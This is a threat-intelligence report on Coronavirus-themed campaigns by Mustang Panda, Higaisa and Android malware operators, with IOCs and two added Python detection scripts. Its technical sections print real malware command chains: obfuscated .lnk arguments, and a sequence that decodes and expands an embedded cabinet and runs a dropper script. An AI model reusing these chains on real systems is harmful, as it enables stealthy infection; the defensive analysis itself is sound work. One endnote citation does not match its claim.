<p><em>Authored by: Gage Mele, Parthiban R., and Tara Gould</em></p><h3>The Tactics, Techniques and Procedures (TTPs) Are Known but the Content Is Coronavirus-Themed</h3><h2>Overview</h2><p>Threat actors are utilizing the global spread of COVID-19 (Coronavirus) to conduct malicious activity. As the world responds to this threat in various ways, actors are attempting to use the chaos to their advantage. COVID-19 is being weaponized for scare tactics by threat actors for conducting malicious activity utilizing different Tactics, Techniques, and Procedures (TTPs). While the majority of observations made by Anomali Threat Research (ATR) are commodity (purchasable and widely distributed) campaigns and malware. ATR identified that the Higaisa and Mustang Panda Advanced Persistent Threat (APT) groups have been utilizing Coronavirus-themed lures in their campaigns.</p><p>In addition to machine-targeted campaigns, ATR also identified COVID-19-themes targeting Android mobile devices. One of the samples is utilizing a fully functional Coronavirus infection-tracking application while the SpyNote Remote Access Trojan (RAT) runs in the background. Another is a phishing campaign that uses a fake Adobe Flash update and COVID-19 related URLs to install the Cerberus banking trojan. 
While some of these malware are commodity and may be more obvious malicious attempts, actors will likely continue to abuse these themes to install various malware families, some of which will be discussed below.</p><h2>Details</h2><p>The current activity being reported on open sources consists of threat actors using COVID-19 as part of phishing campaigns, both in email subject and content as well as attachments.<sup>[1]</sup> These kind of virus-themed campaigns began almost immediately after the 41 cases of COVID-19 were reported on by the World Health Organization on December 31, 2019.<sup>[2]</sup> By January and February 2020, Coronavirus-themed lures were widespread with assistance from the Emotet botnet.<sup>[3]</sup> The malware used in these campaigns can vary because many distribution methods are offered for purchase and utilized by numerous actors, however, there have been some instances of Advanced Persistent Threat (APT) actors attempting to capitalize on the COVID-19 outbreak.</p><p>In mid-March 2020, Check Point Research published their findings regarding a campaign targeting the Mongolian public sector utilizing Coronavirus-themed lure documents.<sup>[4]</sup> This RTF activity also coincides with RTF activity identified by ATR.<sup>[5]</sup> APTs frequently use relevant themes as lures, and ATR has also identified such groups attempting to capitalize on Coronavirus-related events.</p><h2>APT Activity</h2><p>ATR observed a campaign beginning in late February through mid-March 2020, that we believe is being conducted by the China-based APT group, Mustang Panda. The group is utilizing decoy documents related to COVID-19 to target Taiwan and Vietnam. Mustang Panda is continuing to use Cobalt Strike and PlugX RAT as their final payloads. 
This activity aligns with Mustang Panda TTPs previously identified by ATR.<sup>[6]</sup></p><h2>Lure Documents</h2><p><strong>Document title</strong> - 02-21-1.docx</p><p><strong>Hash</strong> - 6d994c64c17ce50cbb333c8b4bcbd8e0</p><p style="text-align: center;"><em><strong><img alt="Chen Chien-jen Facebook Discussion" src="https://cdn.filestackcontent.com/uygM4gr8S5SXzbVienvd"/><br/> Figure 1</strong> - Chen Chien-jen Facebook Discussion</em></p><p>The document above describes a post on Facebook written by Chen Chien-jen, the current Vice President of the Republic of China and former Vice President of the Taiwanese research institution Academia Sinica. The post discusses community transmission [of Coronavirus] and the United States’ (US) Centers for Disease Control (CDC) listing of countries for it, specifically Taiwan. Taiwan’s Foreign Ministry subsequently demanded removal from said listing.</p><p><strong>Document title</strong> - 03-01-1.docx</p><p><strong>Hash</strong> - 7f0a1bdde14ea1f3085b43bdadcfb146</p><p style="text-align: center;"><em><strong><img alt="COVID-19 Questions" src="https://cdn.filestackcontent.com/F3mexsJeRa6uoPeqwMFH"/><br/> Figure 2</strong> - COVID-19 Questions</em></p><p>Figure 2 contains text that appears to have been translated into English, likely from Chinese given that Mustang Panda is China-based; the spelling and grammar errors would be uncommon for a native speaker. 
The text poses questions about neutralizing COVID-19 with varying levels of sophistication.</p><p><strong>Document title</strong> - Chi Thi cua thu tuong nguyen xuan phuc.doc</p><p><strong>Hash</strong> - 13d61974d2db537bdb0504cfc53b74a7</p><p style="text-align: center;"><em><strong><img alt="Vietnamese Government Meeting Article from March 3, 2020" src="https://cdn.filestackcontent.com/RLzDfxvnTBOFLYCNC7B4"/><br/> Figure 3</strong> - Vietnamese Government Meeting Article from March 3, 2020</em></p><p>The document in Figure 3 is an article discussing a meeting held by Vietnamese Prime Minister Nguyen Xuan Phuc on March 3, 2020. Other government officials attending the meeting spoke of unity in these times and of how approximately 3,000 people have been placed in isolation under the care of the army. Other topics include overall Coronavirus prevention measures and updates on travel restrictions. The article is publicly available at www.cantho.gov[.]vn and was likely taken by Mustang Panda from this source, as ATR has observed in previous campaigns conducted by the group.</p><h2>Technical Analysis</h2><p>The three RAR archives (compressed files) mentioned above each contain a Windows Shortcut (.lnk) file. The .lnk files utilized by Mustang Panda typically contain an embedded HTA file with VBScript that, once executed, drops and opens the decoy document while the payload's malicious activity runs in the background. 
ATR observed PlugX and Cobalt Strike being delivered as the primary payloads throughout the campaign.</p><h3>.lnk files</h3><p style="text-align: center;"><em><strong>Table 1</strong> - .lnk file metadata</em></p><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">FileMD5</th><th style="word-wrap: break-word;">LinkModifiedDate</th><th style="word-wrap: break-word;">FileSize</th><th style="word-wrap: break-word;">NameString</th><th style="word-wrap: break-word;">CommandLineArgs</th><th style="word-wrap: break-word;">NetBios Name</th><th style="word-wrap: break-word;">MAC Address</th></tr><tr><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-21-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-67od36i8f4c</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-01-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">cia-at28--planc</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">A4B7FE08900074B6A103D2CF36730421</td><td style="word-wrap: break-word;">11/21/2010 3:24</td><td style="word-wrap: break-word;">302592</td><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td 
style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-gnhs1vcenrt</td><td style="word-wrap: break-word;">AA:50:18:7E:EB:82</td></tr></tbody></table><h3>Payload Analysis</h3><p>Mustang Panda has used the well-known adversary emulation tool Cobalt Strike as the final payload for the samples <strong>02-21-1.lnk</strong> and <strong>03-01-1.lnk</strong>. The group utilized the Malleable Command and Control (C2) feature of Cobalt Strike to mask the malicious traffic behind a legitimate DNS request to code.jquery.com. The samples mentioned above use 123.51.185[.]75 as their final C2.</p><p>Two notable changes from previous Mustang Panda campaigns identified by ATR are:</p><ul><li>A change in the directory where the payload is dropped, now <strong>C:\Users\Public\Music</strong></li><li>Use of the legitimate executable <strong>tencentsoso.exe</strong> for DLL side-loading</li></ul><p>The sample <strong>Chi Thi cua thu tuong nguyen xuan phuc.lnk</strong> uses <strong>PlugX</strong> as its final payload. Once executed, it drops three files in the directory <strong>C:\ProgramData\Microsoft Malware Protection\ydy</strong>. <strong>unescapp.exe</strong> is a legitimate executable signed by “ESET, spol. s r.o.”; it is abused through DLL hijacking to execute http_dll.dll, which decodes and loads the malicious payload http_dll.dat. 
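</p><p>The CommandLineArgs in Table 1 above hide the cmd.exe keyword "for" behind environment-variable substring expansion (f%windir:~-3,1%%PUBLIC:~-9,1%). The resolver below is an added example for detection engineers, not tooling from this report; it assumes stock values for windir and PUBLIC and a constructed TEMP path, and reports which keywords appear only after expansion, a useful signal for command-line detection logic.</p>

```python
"""Resolve cmd.exe %VAR:~start,len% substring expansion in a command line.

Added example for detection engineers; it is not tooling from the Anomali
report. The environment values are assumed defaults for a stock Windows
install plus a constructed user name.
"""
import re
from typing import Optional

# Assumed environment (constructed): what cmd.exe would see on a typical host.
ASSUMED_ENV = {
    "windir": r"C:\Windows",
    "PUBLIC": r"C:\Users\Public",
    "TEMP": r"C:\Users\analyst\AppData\Local\Temp",
}

# Matches %NAME:~start% and %NAME:~start,len% (cmd.exe substring syntax).
SUBSTR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*):~(-?\d+)(?:,(-?\d+))?%")

# Interpreters and built-ins whose appearance only after expansion is suspicious.
WATCHED_KEYWORDS = ("for", "start", "cmd", "powershell", "mshta",
                    "wscript", "cscript", "certutil", "rundll32")


def cmd_substring(value: str, start: int, length: Optional[int]) -> str:
    """Apply cmd.exe substring rules: a negative start counts from the end,
    a negative length stops that many characters before the end, and an
    omitted length runs to the end of the value."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        end = n + length
        return value[start:end] if end > start else ""
    return value[start:start + length]


def lookup_env(env: dict, name: str) -> Optional[str]:
    """Case-insensitive lookup, as cmd.exe treats variable names."""
    for key, val in env.items():
        if key.lower() == name.lower():
            return val
    return None


def expand_substrings(cmdline: str, env: dict = ASSUMED_ENV) -> str:
    """Replace each %VAR:~s,l% token whose variable is known in env.

    Unknown variables and for-loop variables such as %x or %i are left
    untouched, and an unterminated token (no closing %) stays literal."""
    def repl(match):
        val = lookup_env(env, match.group(1))
        if val is None:
            return match.group(0)
        length = int(match.group(3)) if match.group(3) is not None else None
        return cmd_substring(val, int(match.group(2)), length)
    return SUBSTR_RE.sub(repl, cmdline)


def keywords_revealed(cmdline: str, env: dict = ASSUMED_ENV) -> list:
    """Watched keywords that appear only after expansion: a detection signal
    for substring-obfuscated command lines like those in Table 1."""
    before = set(re.findall(r"[a-z0-9]+", cmdline.lower()))
    after = set(re.findall(r"[a-z0-9]+", expand_substrings(cmdline, env).lower()))
    return sorted(k for k in WATCHED_KEYWORDS if k in after and k not in before)


# CommandLineArgs of 02-21-1.lnk as printed in Table 1 (truncated there after
# "%TEMP:~-2", so that last token has no closing % and is left as is).
TABLE1_ARGS = ('/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do '
               'f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in '
               '(\'dir "%x-21-1.lnk" /s /b\') do start %TEMP:~-2')

if __name__ == "__main__":
    # "f" + 3rd-from-last char of C:\Windows ("o")
    #     + 9th-from-last char of C:\Users\Public ("r")  ->  "for"
    print(expand_substrings(TABLE1_ARGS))
    print("revealed:", keywords_revealed(TABLE1_ARGS))
```

<p>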
Upon execution, the payload reaches out to the C2 domain vietnam[.]zing[.]photos, which resolves to 104.160.44[.]85.</p><p style="text-align: center;"><em><strong><img alt="Dropped File Location" src="https://cdn.filestackcontent.com/RXEMSlWiTSiqbrIp0Rgd"/><br/> Figure 4</strong> - Dropped File Location</em></p><p>ATR attributes this activity to Mustang Panda based on the TTPs, the targeted countries, and the use of malware families that have all been previously attributed to the group.<sup>[7]</sup></p><h2>Higaisa Activity</h2><p><strong>File name</strong> - Covid.pdf.lnk</p><p><strong>Hash</strong> - 21a51a834372ab11fba72fb865d6830e</p><p>On March 15, 2020, ATR identified a malicious .lnk file that utilizes an infection chain similar to those of other known APT groups. This campaign was found to use C2 infrastructure that overlaps with that of the Korea-based APT group Higaisa. The lure document, dropped by the .lnk file, was downloaded from the World Health Organization website and is likely being used to target English-speaking individuals and entities.</p><p>The .lnk file uses a multi-stage process to deliver a decoy PDF document (Figure 5) and the final payload, PlugX, which reaches out to the C2 motivation[.]neighboring[.]site, resolving to 69.172.75[.]223. PlugX is a Remote Access Trojan (RAT) that is commonly used by China-based threat actors.</p><p style="text-align: center;"><em><strong><img alt="World Health Organization Situation Report" src="https://cdn.filestackcontent.com/s7AuHINcQlisMpNyC09n"/><br/> Figure 5</strong> - World Health Organization Situation Report</em></p><h3>Technical Analysis</h3><p>The .lnk file contains an embedded blob of base64-encoded content. 
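</p><p>As an added example (not the report's tooling), the following script does from the analyst's side what the command chain later in this section does on the host: it locates the base64 run starting with the cabinet signature TVNDRgAAAA (base64 of "MSCF" followed by zero bytes), decodes it, and parses the cabinet header so that a shortcut carrying an embedded payload container can be flagged without ever running it. The .lnk bytes and the cabinet header it operates on are constructed.</p>

```python
"""Carve a base64-encoded Microsoft Cabinet from a .lnk file and parse its header.

Added example, not tooling from the report. It mirrors, from the analyst side,
what the Higaisa command chain does on the victim (findstr for the base64 CAB
signature, decode, expand). The sample .lnk bytes below are constructed.
"""
import base64
import re
import struct

# base64 of b"MSCF\x00\x00\x00...": the CFHEADER signature plus reserved1 = 0.
CAB_B64_PREFIX = rb"TVNDRgAAAA"
B64_RUN = re.compile(CAB_B64_PREFIX + rb"[A-Za-z0-9+/=\r\n]+")
CFHEADER_LEN = 36


def carve_cab_from_lnk(lnk_bytes: bytes):
    """Return (offset, cab_bytes) for the first embedded base64 CAB, else None."""
    match = B64_RUN.search(lnk_bytes)
    if match is None:
        return None
    run = re.sub(rb"[\r\n]", b"", match.group(0))
    run = run[: len(run) - len(run) % 4]          # drop an incomplete quantum
    try:
        blob = base64.b64decode(run, validate=True)
    except ValueError:
        return None
    if not blob.startswith(b"MSCF"):
        return None
    return match.start(), blob


def parse_cfheader(cab: bytes) -> dict:
    """Parse the fixed CFHEADER fields (MS-CAB format) and flag truncation."""
    if len(cab) < CFHEADER_LEN or cab[:4] != b"MSCF":
        raise ValueError("not a cabinet header")
    (cb_cabinet, coff_files, ver_minor, ver_major,
     c_folders, c_files, flags) = struct.unpack_from("<4xI4xI4xBBHHH", cab, 4)
    return {
        "cbCabinet": cb_cabinet,          # declared total size of the cabinet
        "coffFiles": coff_files,          # offset of the first CFFILE record
        "version": f"{ver_major}.{ver_minor}",
        "cFolders": c_folders,
        "cFiles": c_files,
        "flags": flags,
        "truncated": len(cab) < cb_cabinet,
    }


def triage_lnk(lnk_bytes: bytes) -> dict:
    """Summarise whether a shortcut carries an embedded cabinet and what it says."""
    result = {"size": len(lnk_bytes), "embedded_cab": False}
    carved = carve_cab_from_lnk(lnk_bytes)
    if carved is None:
        return result
    offset, cab = carved
    result.update({"embedded_cab": True, "offset": offset, "cab_len": len(cab)})
    try:
        result.update(parse_cfheader(cab))
    except ValueError:
        result["truncated"] = True        # signature found but header incomplete
    return result


def build_sample_cab() -> bytes:
    """Constructed CFHEADER (version 1.3, one folder, one file) plus 16 bytes of
    padding standing in for the folder/file records; enough to exercise the parser."""
    body_len = 16
    header = b"MSCF" + struct.pack("<IIIIIBBHHHHH",
                                   0, CFHEADER_LEN + body_len, 0, CFHEADER_LEN, 0,
                                   3, 1, 1, 1, 0, 0x1234, 0)
    return header + b"\x00" * body_len


# Constructed stand-in for a .lnk: the ShellLink header (size 0x4C, LinkCLSID),
# some filler, then the base64 cabinet on its own line as findstr would see it.
SAMPLE_LNK = (b"L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
              b"\x00\x00\x00\x46" + b"\x00" * 60 + b"\r\n"
              + base64.b64encode(build_sample_cab()) + b"\r\n" + b"\x00" * 8)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

<p>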
Inspecting the .lnk metadata, it appears that the actor has modified it: the creation time, Machine ID, and MAC address fields have been tampered with, as shown in Figure 6.</p><p style="text-align: center;"><em><strong><img alt=".lnk Metadata" src="https://cdn.filestackcontent.com/eqfWi7L2SbiWLTAI3p0H"/><br/> Figure 6</strong> - .lnk Metadata</em></p><p>Upon execution of the .lnk file, the following commands are run in the background:</p><pre> /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\g4ZokyumBB2gDn.tmp /y&amp; for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %tmp%\msoia.exe /y&amp; findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp&gt;%tmp%\cSi1r0uywDNvDu.tmp&amp;%tmp%\ msoia.exe -decode %tmp%\cSi1r0uywDNvDu.tmp %tmp%\oGhPGUDC03tURV.tmp&amp; expand %tmp%\oGhPGUDC03tURV.tmp -F:* %tmp% &amp; wscript %tmp%\9sOXN6Ltf0afe7.js</pre><p>The file cSi1r0uywDNvDu.tmp is a <strong>Windows cabinet</strong> (.cab) file. The contents of the cabinet file are shown in Figure 7 below.</p><p style="text-align: center;"><em><strong><img alt="Contents of Cabinet File" src="https://cdn.filestackcontent.com/ul1qz0k5TzOkbB9uFgzY"/><br/> Figure 7</strong> - Contents of Cabinet File</em></p><p>The contents of the cabinet file are extracted using the built-in Windows executable <strong>extract.exe</strong> and renamed as shown in Figure 8.</p><p style="text-align: center;"><em><strong><img alt="Renamed Cabinet File Contents" src="https://cdn.filestackcontent.com/lQYd6ZqxQ4OOjClgNMbT"/><br/> Figure 8</strong> - Renamed Cabinet File Contents</em></p><p>The JavaScript, <strong>9sOXN6Ltf0afe7.js</strong>, performs multiple operations, such as copying and renaming files, and uses a living-off-the-land technique to execute the VBScript file <strong>WsmPty.xsl</strong> using <strong>cscript.exe</strong>.<sup>[8]</sup> The VBScript is responsible for creating persistence and executes the further payloads by abusing the legitimate executable 
<strong>msostyle.exe</strong>. Upon execution, msostyle.exe loads the file <strong>oinfo12.ocx</strong> (a DLL), which in turn loads and executes <strong>wordcnvpxy.exe</strong> (PlugX). The malware reaches out to the C2 URL motivation[.]neighboring[.]site/01/index.php.</p><p>Figures 9 and 10 below depict the infrastructure overlap mentioned above. The C2 IP, 69.172.75[.]223, was previously used by Higaisa and reported on in late February 2020.<sup>[9]</sup></p><p style="text-align: center;"><em><strong><img alt="Higaisa C2 Overlap" src="https://cdn.filestackcontent.com/ajDr1oOwS5mDVpgKZYTu"/><br/> Figure 9</strong> - Higaisa C2 Overlap</em></p><p style="text-align: center;"><em><strong><img alt="Higaisa Sample Communication to IP" src="https://cdn.filestackcontent.com/2sT6sKDuRiqyJkJYds6e"/><br/> Figure 10</strong> - Higaisa Sample Communication to IP (https://community.riskiq.com/search/69.172.75.223)</em></p><h2>Mobile Malware</h2><p><strong>APK title</strong> - Avist.apk</p><p><strong>Hash</strong> - 107169ae6951a5cba57d2a0cd274e28fadf5c73d73e91a386f15cf4dc35edd38</p><p>This Android application is fully functional and updates overall COVID-19 statistics as a normal application would. 
While the user installs the COVID-19 tracking application, the <strong>SpyNote</strong> RAT is downloaded in the background.</p><p style="text-align: center;"><em><strong><img alt="Installation Request" src="https://cdn.filestackcontent.com/8zK9aw3WSwyxiZbM6dT7"/><br/> Figure 11</strong> - Installation Request</em></p><p style="text-align: center;"><em><strong><img alt="Functional COVID-19 Application Appearance" src="https://cdn.filestackcontent.com/ySvXmueQ0SxCgJUPCjpg"/><br/> Figure 12</strong> - Functional COVID-19 Application Appearance</em></p><p><strong>APK title</strong> - UpdateFlashPlayer_11_5_1.apk</p><p><strong>Hash</strong> - F57a44bec2f7af2da443f068edb0a743f9625ac3a9d686393bacb8e72274b5de</p><p>The operators of the Android banking trojan Cerberus have been utilizing the attention around the Coronavirus outbreak as an opportunity to push their malware, using various websites, including <strong>coronaviruscovid-19-information[.]com</strong> and <strong>covid19-info[.]online</strong> (among others), to trick users into downloading the Cerberus trojan. Navigating to one of these websites prompts the visitor to download Cerberus masquerading as an Adobe Flash Player update. 
Once installed, Cerberus’ primary objective is to steal financial information; however, the trojan can be manipulated depending on the actor’s objective.</p><p style="text-align: center;"><em><strong><img alt="Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)" src="https://cdn.filestackcontent.com/WN4drmBUReyGZH3kmHvI"/><br/> Figure 13 </strong>- Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)</em></p><h2>IOCs</h2><h3>Domains / IPs / URLs</h3><p>104.160.44[.]85<br/> 123.51.185[.]75<br/> 69.172.75[.]223<br/> vietnam[.]zing[.]photos<br/> motivation[.]neighboring[.]site<br/> http://vietnam.zing.photos:443/update?wd=df07d8ba<br/> motivation[.]neighboring[.]site/01/index.php</p><h3>Hashes</h3><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">File Name</th><th style="word-wrap: break-word;">MD5 Hash</th></tr><tr><td style="word-wrap: break-word;">Http_dll.dat</td><td style="word-wrap: break-word;">0DE06292C0010A4E8F453806373E68D4</td></tr><tr><td style="word-wrap: break-word;">http_dll.dll</td><td style="word-wrap: break-word;">415591D11CF6AEB940AC92C904A1F26A</td></tr><tr><td style="word-wrap: break-word;">02-21-1.rar</td><td style="word-wrap: break-word;">A0D41E87BF259CE882C4977D79FA806A</td></tr><tr><td style="word-wrap: break-word;">03-01-1.rar</td><td style="word-wrap: break-word;">24AF885E38D7CA7912824F2470E5E6BE</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.rar</td><td style="word-wrap: break-word;">60C89B54029442C5E131F01FF08F84C9</td></tr><tr><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td></tr><tr><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td style="word-wrap: 
break-word;">A4B7FE08900074B6A103D2CF36730421</td></tr><tr><td style="word-wrap: break-word;">3UDBUTNY7YstRc.tmp</td><td style="word-wrap: break-word;">83D04F21515C7E6316F9CD0BB393A118</td></tr><tr><td style="word-wrap: break-word;">486AULMsOPmf6W.tmp</td><td style="word-wrap: break-word;">371E896D818784934BD1456296B99CBE</td></tr><tr><td style="word-wrap: break-word;">9sOXN6Ltf0afe7.js</td><td style="word-wrap: break-word;">4F8FF5E70647DBC5D91326346C393729</td></tr><tr><td style="word-wrap: break-word;">cSi1r0uywDNvDu.tmp</td><td style="word-wrap: break-word;">EEFEB76D26338E09958AAE5D81479178</td></tr><tr><td style="word-wrap: break-word;">MiZl5xsDRylf0W.tmp</td><td style="word-wrap: break-word;">C1D8966FA1BD7AEE41B2C4AD731407D3</td></tr><tr><td style="word-wrap: break-word;">oGhPGUDC03tURV.tmp</td><td style="word-wrap: break-word;">37f78b1ad43959a788162f560bdc9c79</td></tr><tr><td style="word-wrap: break-word;">Covid.pdf.lnk</td><td style="word-wrap: break-word;">21a51a834372ab11fba72fb865d6830e</td></tr><tr><td style="word-wrap: break-word;">Covid.zip</td><td style="word-wrap: break-word;">a89607c9515caeb1d784439a1ee1f208</td></tr><tr><td style="word-wrap: break-word;">Wordcnvpxy.exe</td><td style="word-wrap: break-word;">fd648c3b7495abbe86b850587e2e5431</td></tr><tr><td style="word-wrap: break-word;">20200308-sitrep-48-covid-19.pdf</td><td style="word-wrap: break-word;">FAF5EF01F4A9BF2ABA7EDE67DCC5A2D4</td></tr><tr><td style="word-wrap: break-word;">covid-19.jar</td><td style="word-wrap: break-word;">13c26ea1dc3a2fee403a7913f6f66c03</td></tr><tr><td style="word-wrap: break-word;">covid-precautions .exe</td><td style="word-wrap: break-word;">45a0797b74db206615e92050ecf7b31e</td></tr><tr><td style="word-wrap: break-word;">Basic_protection.pdf</td><td style="word-wrap: break-word;">c9184430cfd1e72ff9213e67f73b06c2</td></tr><tr><td style="word-wrap: break-word;">file2.exe</td><td style="word-wrap: break-word;">ec517204fbcf7a980d137b116afa946d</td></tr><tr><td 
style="word-wrap: break-word;">CoronaVirus_Video-11032020BRTORS2VYLLOC8NTR7DA79YIM6.vbs</td><td style="word-wrap: break-word;">0a648ccc4c7ce4f4315adc22878c49c2</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name:%22Official%20communication%20by%20Ferribiella%20Italy-CORONAVIRUS%2011.03.2020_EN.exe%22" target="_blank">Official communication by Ferribiella Italy-CORONAVIRUS 11.03.2020_EN.exe</a></td><td style="word-wrap: break-word;">405f2f6fa2077552fa848bb740bd5ffd</td></tr><tr><td style="word-wrap: break-word;">CORONA TREATMENT.doc</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">logday.dll</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">Coronavirus_disease_COVID-19__773315073441331.doc</td><td style="word-wrap: break-word;">8ff6621ecf76a5632dc7ca459f3e5a89</td></tr><tr><td style="word-wrap: break-word;">卫生部指令.docx</td><td style="word-wrap: break-word;">3519b57181da2548b566d3c49f2bae18</td></tr><tr><td style="word-wrap: break-word;">武汉旅行信息收集申请表.xlsm</td><td style="word-wrap: break-word;">b08dc707dcbc1604cfd73b97dc91a44c</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name%253A%2522POEA%2520HEALTH%2520ADVISORY%2520re-2020%2520Novel%2520Corona%2520Virus.pdf.exe%2522" target="_blank">POEA HEALTH ADVISORY re-2020 Novel Corona Virus.pdf.exe</a></td><td style="word-wrap: break-word;">f59c558d9b33a25ac8b32f495f6fd035</td></tr><tr><td style="word-wrap: break-word;">COVID-19_Tracker.exe</td><td style="word-wrap: break-word;">595149b8dcab35fde269a86d0bd74756</td></tr><tr><td style="word-wrap: break-word;">Avist.apk</td><td style="word-wrap: break-word;">660159f431b5f8ec8c4fed0298168d1a</td></tr><tr><td style="word-wrap: break-word;">https://covid19-info[.]online/UpdateFlashPlayer_11_5_1.apk</td><td style="word-wrap: 
break-word;">3382348f9618058dde3aacffcb34982e</td></tr><tr><td style="word-wrap: break-word;">Corona Virus Advice For Public____________________pdf.exe</td><td style="word-wrap: break-word;">8a228725fe66ab52a62eb44687ad0680</td></tr><tr><td style="word-wrap: break-word;">St John of God Health Care (COVID-19) Notice.pdf</td><td style="word-wrap: break-word;">19fda4048f29fbf6e0c9e0a4b8bd0946</td></tr><tr><td style="word-wrap: break-word;">Download PDF File - Coronavirus Disease 2019 Controls scr</td><td style="word-wrap: break-word;">e7fab8e420dd74157bc4dcc5ab396dc8</td></tr></tbody></table><h3>Other Coronavirus-themed Hashes</h3><h2>Conclusion</h2><p>Threat actors are opportunistic and will continuously update themes of their malicious campaigns in whichever way they believe will increase the chances of completing an objective. 
Commodity malware will change to whatever themes are relevant at the time. As discussed in this report, threat actors are still utilizing TTPs that are known and discussed in the security community; only the content of the social-engineering documents has changed.</p><p>The effects of the Coronavirus are worldwide and increasingly affect individuals both in real life and online. We hope everyone is doing their best to stay safe during these times. Additional information on the Coronavirus can be found on the following websites:</p><ul><li><a href="https://www.cdc.gov/coronavirus/2019-ncov/index.html" target="_blank">https://www.cdc.gov/coronavirus/2019-ncov/index.html</a></li><li><a href="https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public" target="_blank">https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public</a></li></ul><h2>Endnotes</h2><p><sup>[1]</sup> CISA, “Defending Against COVID-19 Cyber Scams,” US-CERT, accessed March 17, 2020, published March 6, 2020, <a href="https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams" target="_blank">https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams</a>; Insikt Group, “Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide,” Recorded Future, accessed March 17, 2020, published March 12, 2020, <a href="https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf" target="_blank">https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf</a>.</p><p><sup>[2]</sup> “Rolling updates on Coronavirus disease (COVID-19),” World Health Organization, accessed March 17, 2020, published March 18, 2020, <a href="https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen" target="_blank">https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen</a>.</p><p><sup>[3]</sup> Nick Biasini and Edmund Brumghin, “Threat 
actors attempt to capitalize on coronavirus outbreak,” Cisco Talos Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html" target="_blank">https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html</a>; “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/" target="_blank">https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/</a>.</p><p><sup>[4]</sup> “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog.</p><p><sup>[5]</sup> Anomali Threat Research Team, “Multiple Chinese Threat Groups Exploiting CVE-2018-0798 Equation Editor Vulnerability Since Late 2018,” Anomali Blog, accessed March 17, 2020, published July 3, 2019, <a href="https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018">https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018</a>.</p><p><sup>[6]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations,” Anomali Blog, accessed March 17, 2020, published October 7, 2019, 